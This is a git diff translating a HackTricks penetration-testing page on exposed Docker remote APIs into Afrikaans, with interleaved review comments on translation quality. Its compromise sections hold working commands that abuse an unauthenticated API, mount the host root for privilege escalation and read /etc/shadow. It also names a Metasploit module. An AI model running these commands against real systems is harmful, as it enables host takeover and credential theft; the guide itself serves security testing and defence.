+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Docker Basics +## Docker Basiese Beginsels -### What is +### Wat is -Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments. +Docker is die **voorste platform** in die **kontenerisasie-industrie**, wat **voortdurende innovasie** aanvoer. Dit maak die moeiteloos skep en verspreiding van toepassings moontlik, wat strek van **tradisioneel tot futuristies**, en verseker hul **veilige implementering** oor diverse omgewings. -### Basic docker architecture +### Basiese Docker-argitektuur -- **[containerd](http://containerd.io)**: This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**. -- The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized. -- **[runc](http://runc.io)**: Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**. -- **[grpc](http://www.grpc.io)** is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**. -- The **[OCI](https://www.opencontainers.org)** is pivotal in maintaining the **OCI specifications** for runtime and images, with the latest Docker versions being **compliant with both the OCI image and runtime** standards. 
- -### Basic commands +- **[containerd](http://containerd.io)**: Dit is 'n **kernuitvoering** vir kontenere, belas met die omvattende **bestuur van 'n konteiner se lewensiklus**. Dit behels die hantering van **beeldoorplasing en -stoor**, sowel as die toesig oor die **uitvoering, monitering en netwerking** van kontenere. **Meer gedetailleerde insigte** oor containerd word **verder ondersoek**. +- Die **kontainer-shim** speel 'n kritieke rol as 'n **tussenganger** in die hantering van **koplose kontenere**, wat naadloos oorneem vanaf **runc** nadat die kontenere geïnisialiseer is. +- **[runc](http://runc.io)**: Gewaardeer vir sy **liggewig en universele konteineruitvoering**-vermoëns, is runc in lyn met die **OCI-standaard**. Dit word deur containerd gebruik om kontenere **te begin en te bestuur** volgens die **OCI-riglyne**, en het ontwikkel vanuit die oorspronklike **libcontainer**. +- **[grpc](http://www.grpc.io)** is noodsaaklik vir die **fasilitering van kommunikasie** tussen containerd en die **docker-engine**, wat **doeltreffende interaksie** verseker. +- Die **[OCI](https://www.opencontainers.org)** is van kardinale belang om die **OCI-spesifikasies** vir uitvoering en beelde te handhaaf, met die nuutste Docker-weergawes wat **voldoen aan beide die OCI-beeld en -uitvoering**-standaarde. +### Basiese opdragte ```bash docker version #Get version of docker client, API, engine, containerd, runc, docker-init docker info #Get more infomarion about docker settings 
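Review bot: "container" is rendered three ways in this hunk alone (`kontenere`, `konteiner`, `kontainer-shim`), and the later hunks of the same file (Containerd, Podman, Basiese Inligting) switch to `houer`/`houers`; use one term throughout the file, otherwise a reader cannot tell whether these name distinct concepts. The blank line between the architecture list and `### Basiese opdragte`, and between that heading and the bash fence, was also dropped; keep the spacing of the original so the list, heading and code block stay visually separated.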
@@ -51,21 +49,18 @@ docker system prune -a # - all images without at least one container associated to them # - all build cache ``` - ### Containerd -**Containerd** was specifically developed to serve the needs of container platforms like **Docker and Kubernetes**, among others. It aims to **simplify the execution of containers** across various operating systems, including Linux, Windows, Solaris, and more, by abstracting operating system-specific functionality and system calls. The goal of Containerd is to include only the essential features required by its users, striving to omit unnecessary components. However, achieving this goal completely is acknowledged as challenging. - -A key design decision is that **Containerd does not handle networking**. Networking is considered a critical element in distributed systems, with complexities such as Software Defined Networking (SDN) and service discovery that vary significantly from one platform to another. Therefore, Containerd leaves networking aspects to be managed by the platforms it supports. - -While **Docker utilizes Containerd** to run containers, it's important to note that Containerd only supports a subset of Docker's functionalities. Specifically, Containerd lacks the network management capabilities present in Docker and does not support the creation of Docker swarms directly. This distinction highlights Containerd's focused role as a container runtime environment, delegating more specialized functionalities to the platforms it integrates with. +**Containerd** is spesifiek ontwikkel om te voldoen aan die behoeftes van houerplatforms soos **Docker en Kubernetes**, onder andere. Dit streef daarna om die uitvoering van houers te **vereenvoudig oor verskillende bedryfstelsels**, insluitend Linux, Windows, Solaris, en meer, deur bedryfstelsel-spesifieke funksionaliteit en stelseloproepe te abstraheer. 
Die doel van Containerd is om slegs die noodsaaklike funksies wat deur sy gebruikers vereis word, in te sluit, en om onnodige komponente uit te sluit. Dit word egter erken as 'n uitdagende taak om hierdie doel volledig te bereik. +'n Sleutelontwerpbepaling is dat **Containerd nie netwerkhantering hanteer nie**. Netwerking word beskou as 'n kritieke element in verspreide stelsels, met kompleksiteite soos Software Defined Networking (SDN) en diensontdekking wat aansienlik verskil van die een platform tot die ander. Daarom laat Containerd die netwerkaspekte oor aan die platforms wat dit ondersteun. +Terwyl **Docker Containerd gebruik** om houers uit te voer, is dit belangrik om te let dat Containerd slegs 'n subset van Docker se funksionaliteite ondersteun. Spesifiek ontbreek Containerd die netwerkbestuursmoontlikhede wat in Docker teenwoordig is, en ondersteun dit nie die direkte skepping van Docker-swerm nie. Hierdie onderskeid beklemtoon Containerd se gefokusde rol as 'n houer-uitvoeringsomgewing, wat meer gespesialiseerde funksionaliteite oorlaat aan die platforms waarmee dit integreer. ```bash #Containerd CLI ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image ctr images list #List images -ctr container create registry:5000/alpine:latest alpine #Create container called alpine +ctr container create registry:5000/alpine:latest alpine #Create container called alpine ctr container list #List containers ctr container info #Get container info ctr task start #You are given a shell inside of it 
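Review bot: `ctr container create registry:5000/alpine:latest alpine #Create container called alpine` appears as a `-`/`+` pair with identical text, i.e. a whitespace-only change inside the fenced block; drop it so the diff contains only real translation changes. In the prose, `Containerd nie netwerkhantering hanteer nie` is redundant ("does not handle network handling"); `Containerd hanteer nie netwerke nie` is closer to the source sentence that networking is left to the platforms built on it.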
@@ -76,26 +71,24 @@ ctr tasks resume #Resume cotainer ctr task kill -s SIGKILL #Stop running container ctr container delete ``` - ### Podman -**Podman** is an open-source container engine that adheres to the [Open Container Initiative (OCI) standards](https://github.com/opencontainers), developed and maintained by Red Hat. It stands out from Docker with several distinct features, notably its **daemonless architecture** and support for **rootless containers**, enabling users to run containers without root privileges. +**Podman** is 'n oopbron houer-enjin wat voldoen aan die [Open Container Initiative (OCI) standaarde](https://github.com/opencontainers), ontwikkel en onderhou deur Red Hat. Dit steek uit bo Docker met verskeie onderskeidende kenmerke, veral sy **daemonlose argitektuur** en ondersteuning vir **rootless houers**, wat gebruikers in staat stel om houers sonder root-voorregte uit te voer. -Podman is designed to be compatible with Docker's API, allowing for the use of Docker CLI commands. This compatibility extends to its ecosystem, which includes tools like **Buildah** for building container images and **Skopeo** for image operations such as push, pull, and inspect. More details on these tools can be found on their [GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). +Podman is ontwerp om versoenbaar te wees met Docker se API, wat die gebruik van Docker CLI-opdragte moontlik maak. Hierdie versoenbaarheid strek tot sy ekosisteem, wat gereedskap soos **Buildah** vir die bou van houerbeelds en **Skopeo** vir beeldoperasies soos stoot, trek en inspekteer insluit. Meer besonderhede oor hierdie gereedskap kan gevind word op hul [GitHub-bladsy](https://github.com/containers/buildah/tree/master/docs/containertools). -**Key Differences** +**Belangrike Verskille** -- **Architecture**: Unlike Docker’s client-server model with a background daemon, Podman operates without a daemon. 
This design means containers run with the privileges of the user who starts them, enhancing security by eliminating the need for root access. - -- **Systemd Integration**: Podman integrates with **systemd** to manage containers, allowing for container management through systemd units. This contrasts with Docker's use of systemd primarily for managing the Docker daemon process. +- **Argitektuur**: In teenstelling met Docker se klient-bedienermodel met 'n agtergrond-daemon, werk Podman sonder 'n daemon. Hierdie ontwerp beteken dat houers uitgevoer word met die voorregte van die gebruiker wat hulle begin, wat die veiligheid verbeter deur die behoefte aan root-toegang uit te skakel. -- **Rootless Containers**: A pivotal feature of Podman is its ability to run containers under the initiating user's privileges. This approach minimizes the risks associated with container breaches by ensuring that attackers gain only the compromised user's privileges, not root access. +- **Systemd-integrasie**: Podman integreer met **systemd** om houers te bestuur, wat die bestuur van houers deur systemd-eenhede moontlik maak. Dit staan in kontras met Docker se gebruik van systemd hoofsaaklik vir die bestuur van die Docker-daemonproses. -Podman's approach offers a secure and flexible alternative to Docker, emphasizing user privilege management and compatibility with existing Docker workflows. +- **Rootless Houers**: 'n Sleutelkenmerk van Podman is sy vermoë om houers onder die voorregte van die inisieerende gebruiker uit te voer. Hierdie benadering verminder die risiko's wat gepaard gaan met houer-oortredings deur te verseker dat aanvallers slegs die voorregte van die gekompromitteerde gebruiker verkry, nie root-toegang nie. + +Podman se benadering bied 'n veilige en buigsame alternatief vir Docker, met die klem op gebruikersvoorregbestuur en versoenbaarheid met bestaande Docker-werkvloeie. 
{% hint style="info" %} -Note that as podam aims to support the same API as docker, you can use the same commands with podman as with docker such as: - +Let daarop dat aangesien podman daarop gemik is om dieselfde API as docker te ondersteun, kan jy dieselfde opdragte met podman gebruik as met docker, soos: ```bash podman --version podman info @@ -104,23 +97,20 @@ podman ls ``` {% endhint %} -## Basic Information +## Basiese Inligting -Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / (root directory) to the container and read/write files of the host’s environment. - -**Default port:** 2375 +Die afstands-API word standaard op poort 2375 uitgevoer as dit geaktiveer is. Die diens vereis standaard nie verifikasie nie, wat 'n aanvaller in staat stel om 'n bevoorregte docker-houer te begin. Deur die gebruik van die afstands-API kan 'n persoon gasheerders / (wortelgids) aan die houer koppel en lêers van die gasheer se omgewing lees/skryf. +**Standaardpoort:** 2375 ``` PORT STATE SERVICE 2375/tcp open docker ``` +## Enumerasie -## Enumeration - -### Manual - -Note that in order to enumerate the docker API you can use the `docker` command or `curl` like in the following example: +### Handleiding +Let daarop dat jy die Docker API kan ondersoek deur die `docker`-opdrag of `curl` te gebruik, soos in die volgende voorbeeld: ```bash #Using curl curl -s http://open.docker.socket:2375/version | jq #Get version 
@@ -129,50 +119,46 @@ curl -s http://open.docker.socket:2375/version | jq #Get version #Using docker docker -H open.docker.socket:2375 version #Get version Client: Docker Engine - Community - Version: 19.03.1 - API version: 1.40 - Go version: go1.12.5 - Git commit: 74b1e89 - Built: Thu Jul 25 21:21:05 2019 - OS/Arch: linux/amd64 - Experimental: false +Version: 19.03.1 +API version: 1.40 +Go version: go1.12.5 +Git commit: 74b1e89 +Built: Thu Jul 25 21:21:05 2019 +OS/Arch: linux/amd64 +Experimental: false Server: Docker Engine - Community - Engine: - Version: 19.03.1 - API version: 1.40 (minimum version 1.12) - Go version: go1.12.5 - Git commit: 74b1e89 - Built: Thu Jul 25 21:19:41 2019 - OS/Arch: linux/amd64 - Experimental: false - containerd: - Version: 1.2.6 - GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb - runc: - Version: 1.0.0-rc8 - GitCommit: 425e105d5a03fabd737a126ad93d62a9eeede87f - docker-init: - Version: 0.18.0 - GitCommit: fec3683 +Engine: +Version: 19.03.1 +API version: 1.40 (minimum version 1.12) +Go version: go1.12.5 +Git commit: 74b1e89 +Built: Thu Jul 25 21:19:41 2019 +OS/Arch: linux/amd64 +Experimental: false +containerd: +Version: 1.2.6 +GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb +runc: +Version: 1.0.0-rc8 +GitCommit: 425e105d5a03fabd737a126ad93d62a9eeede87f +docker-init: +Version: 0.18.0 +GitCommit: fec3683 ``` - -If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service. +As jy die afgeleë docker API kan **kontak met die `docker` bevel**, kan jy enige van die **docker** [**bevele wat voorheen** bespreek is](2375-pentesting-docker.md#basic-commands) uitvoer om met die diens te kommunikeer. 
{% hint style="info" %} -You can `export DOCKER_HOST="tcp://localhost:2375"` and **avoid** using the `-H` parameter with the docker command +Jy kan `export DOCKER_HOST="tcp://localhost:2375"` gebruik en die `-H` parameter met die docker bevel **vermy**. {% endhint %} -#### Fast privilege escalation - +#### Vinnige bevoorregte eskalasie ```bash docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash ``` - #### Curl -Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but it's possible to do it with curl. - +Soms sal jy sien dat **2376** beskikbaar is vir die **TLS** eindpunt. Ek kon nie daarin slaag om daarmee te verbind met die docker-kliënt nie, maar dit is moontlik om dit met curl te doen. ```bash #List containers curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq 
@@ -202,104 +188,94 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope #Delete stopped containers curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune ``` +As jy meer inligting wil hê oor hierdie, is meer inligting beskikbaar waar ek die opdragte gekopieer het: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) -If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) - -### Automatic - +### Outomaties ```bash msf> use exploit/linux/http/docker_daemon_tcp nmap -sV --script "docker-*" -p ``` +## Kompromittering -## Compromising - -In the following page you can find ways to **escape from a docker container**: +In die volgende bladsy kan jy maniere vind om **uit 'n Docker-houer te ontsnap**: {% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %} [docker-security](../linux-hardening/privilege-escalation/docker-security/) {% endcontent-ref %} -Abusing this it's possible to escape form a container, you could run a weak container in the remote machine, escape from it, and compromise the machine: - +Deur hiervan misbruik te maak, is dit moontlik om uit 'n houer te ontsnap. 
Jy kan 'n swak houer op die afgeleë masjien uitvoer, daaruit ontsnap en die masjien kompromitteer: ```bash docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine cat /mnt/etc/shadow ``` - * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py) -## Privilege Escalation +## Voorregverhoging -If you are inside a host that is using docker, you may [**read this information to try to elevate privileges**](../linux-hardening/privilege-escalation/#writable-docker-socket). - -## Discovering secrets in running Docker containers +As jy binne 'n gasheer is wat Docker gebruik, kan jy [**hierdie inligting lees om te probeer om voorregte te verhoog**](../linux-hardening/privilege-escalation/#writable-docker-socket). +## Ontdekking van geheime in lopende Docker-houers ```bash docker ps [| grep ] docker inspect ``` +Kyk na **env** (omgewingsveranderlike afdeling) vir geheime en jy mag dalk vind: -Check **env** (environment variable section) for secrets and you may find: - -* Passwords. -* Ip’s. -* Ports. -* Paths. -* Others… . - -If you want to extract a file: +* Wagwoorde. +* IP-adresse. +* Poorte. +* Paaie. +* Ander... . +As jy 'n lêer wil onttrek: ```bash docker cp :/etc/ ``` +## Beveiliging van jou Docker -## Securing your Docker +### Beveiliging van Docker installasie en gebruik -### Securing Docker installation and usage +* Jy kan die instrument [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) gebruik om jou huidige Docker installasie te ondersoek. +* `./docker-bench-security.sh` +* Jy kan die instrument [https://github.com/kost/dockscan](https://github.com/kost/dockscan) gebruik om jou huidige Docker installasie te ondersoek. 
+* `dockscan -v unix:///var/run/docker.sock` +* Jy kan die instrument [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) gebruik om die voorregte te bepaal wat 'n houer sal hê wanneer dit met verskillende sekuriteitsopsies uitgevoer word. Dit is nuttig om die implikasies van die gebruik van sekuriteitsopsies vir die uitvoer van 'n houer te ken: +* `docker run --rm -it r.j3ss.co/amicontained` +* `docker run --rm -it --pid host r.j3ss.co/amicontained` +* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained` -* You can use the tool [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) to inspect your current docker installation. - * `./docker-bench-security.sh` -* You can use the tool [https://github.com/kost/dockscan](https://github.com/kost/dockscan) to inspect your current docker installation. - * `dockscan -v unix:///var/run/docker.sock` -* You can use the tool [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) the privileges a container will have when run with different security options. This is useful to know the implications of using some security options to run a container: - * `docker run --rm -it r.j3ss.co/amicontained` - * `docker run --rm -it --pid host r.j3ss.co/amicontained` - * `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained` +### Beveiliging van Docker Images -### Securing Docker Images +* Jy kan 'n Docker-beeld van [https://github.com/quay/clair](https://github.com/quay/clair) gebruik om jou ander Docker-beelde te skandeer en kwesbaarhede te vind. 
+* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"` +* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image` -* You can use a docker image of [https://github.com/quay/clair](https://github.com/quay/clair) to make it scan your other docker images and find vulnerabilities. - * `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"` - * `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image` +### Beveiliging van Dockerfiles -### Securing Dockerfiles - -* You can use the tool [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) to **inspect your Dockerfile** and find all kinds of misconfigurations. Each misconfiguration will be given an ID, you can find here [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) how to fix each of them. - * `dockerfilelinter -f Dockerfile` +* Jy kan die instrument [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. Elke verkeerde konfigurasie sal 'n ID kry, jy kan hier [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) vind hoe om elkeen van hulle reg te stel. +* `dockerfilelinter -f Dockerfile` ![](<../.gitbook/assets/image (418).png>) -* You can use the tool [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) to **inspect your Dockerfile** and find all kinds of misconfigurations. 
- * `dockerfilelint Dockerfile` +* Jy kan die instrument [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `dockerfilelint Dockerfile` ![](<../.gitbook/assets/image (419).png>) -* You can use the tool [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) to **inspect your Dockerfile** and find all kinds of misconfigurations. - * `dockerlint Dockerfile` +* Jy kan die instrument [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `dockerlint Dockerfile` ![](<../.gitbook/assets/image (420).png>) -* You can use the tool [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) to **inspect your Dockerfile** and find all kinds of misconfigurations. - * `hadolint Dockerfile` +* Jy kan die instrument [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `hadolint Dockerfile` ![](<../.gitbook/assets/image (421).png>) -### Logging Suspicious activity - -* You can use the tool [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) to detect **suspicious behaviour in running containers**. - * Note in the following chunk how **Falco compiles a kernel module and insert it**. After that, it loads the rules and **start logging suspicious activities**. In this case it has detected 2 privileged containers started, 1 of them with a sensitive mount, and after some seconds it detected how a shell was opened inside one of the containers. +### Log van Verdagte aktiwiteit +* Jy kan die instrument [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) gebruik om **verdagte gedrag in lopende houers** op te spoor. 
+* Merk op in die volgende blok hoe **Falco 'n kernmodule saamstel en dit invoeg**. Daarna laai dit die reëls en **begin om verdagte aktiwiteite te log**. In hierdie geval het dit 2 bevoorregte houers opgespoor wat begin is, waarvan een 'n sensitiewe koppeling het, en na 'n paar sekondes het dit opgespoor hoe 'n skulp geopen is binne een van die houers. ```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco * Setting up /usr/src links from host @@ -318,10 +294,10 @@ DKMS: build completed. falco-probe.ko: Running module version sanity check. modinfo: ERROR: missing module or filename. - - Original module - - No original module exists within this kernel - - Installation - - Installing to /lib/modules/5.0.0-20-generic/kernel/extra/ +- Original module +- No original module exists within this kernel +- Installation +- Installing to /lib/modules/5.0.0-20-generic/kernel/extra/ mkdir: cannot create directory '/lib/modules/5.0.0-20-generic/kernel/extra': Read-only file system cp: cannot create regular file '/lib/modules/5.0.0-20-generic/kernel/extra/falco-probe.ko': No such file or directory 
@@ -340,25 +316,24 @@ falco-probe found and loaded in dkms 2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest) 2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu) ``` +### Monitering Docker -### Monitoring Docker +Jy kan auditd gebruik om Docker te monitor. -You can use auditd to monitor docker. - -## References +## Verwysings * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**offisiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
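Review bot: `### Handleiding` is the wrong word for the `### Manual` heading in hunk `@@ -104,23 +97,20 @@`. Here "Manual" is the counterpart of the `### Automatic` heading (rendered as `### Outomaties` in a later hunk of this file), so it should be `### Handmatig`; "Handleiding" means a handbook. In the same hunk the blank lines that separated `## Basic Information`, `**Default port:**` and the fence were dropped (`+**Standaardpoort:** 2375` is now immediately followed by the opening fence); keep the source's blank lines so the rendered layout matches the other language versions.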
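Review bot: the fenced `docker version` output in hunk `@@ -129,50 +119,46 @@` has had its leading indentation stripped (`- Version: 19.03.1` became `+Version: 19.03.1`, `- Engine:` became `+Engine:`, and likewise for the whole Server block), which alters quoted program output rather than translating it. Fenced blocks should be excluded from the translation pass and left byte-for-byte. In the same hunk `#### Vinnige bevoorregte eskalasie` reads as "fast privileged escalation"; this file renders "Privilege Escalation" as `## Voorregverhoging` in the next hunk, so `#### Vinnige voorregverhoging` keeps the terminology consistent.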
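Review bot: in hunk `@@ -202,104 +188,94 @@` the nested command bullets under "Securing Docker installation and usage", "Securing Docker Images" and "Securing Dockerfiles" lost their indentation (`-  * `./docker-bench-security.sh`` became `+* `./docker-bench-security.sh``, and the same happened to the `dockscan`, `amicontained`, `clair` and linter command lines), so each command now renders as a sibling of the tool it belongs to instead of a sub-item. Restore the indentation; list structure is content, not language, and should survive the translation unchanged.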
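Review bot: hunk `@@ -318,10 +294,10 @@` changes nothing but the leading whitespace of four lines of DKMS output inside the Falco fence (`-  - Original module` to `+- Original module`, and the three lines after it). That is quoted tool output, so the change is a regression and the hunk should be dropped entirely.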
diff --git a/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 60a0eaa37..9d6a165ee 100644 --- a/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -1,69 +1,61 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. - -**Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\ -For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._ +**GlusterFS** is 'n **verspreide lêersisteem** wat stoorplek van verskeie bedieners in een **geïntegreerde stelsel** kombineer. Dit maak voorsiening vir **arbitrêre skaalbaarheid**, wat beteken dat jy stoorbedieners maklik kan byvoeg of verwyder sonder om die algehele lêersisteem te ontwrig. Dit verseker hoë **beskikbaarheid** en **fouttoleransie** vir jou data. Met GlusterFS kan jy by jou lêers kom asof hulle plaaslik gestoor word, ongeag die onderliggende bediener-infrastruktuur. Dit bied 'n kragtige en buigsame oplossing vir die bestuur van groot hoeveelhede data oor verskeie bedieners. +**Verstekpoorte**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (en verder)\ +Vir die poort 49152 moet poorte wat met 1 verhoog word, oop wees om meer bakstene te gebruik. _Vroeër is die poort 24009 in plaas van 49152 gebruik._ ``` PORT STATE SERVICE 24007/tcp open rpcbind 49152/tcp open ssl/unknown ``` +## Opname -## Enumeration - -To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). 
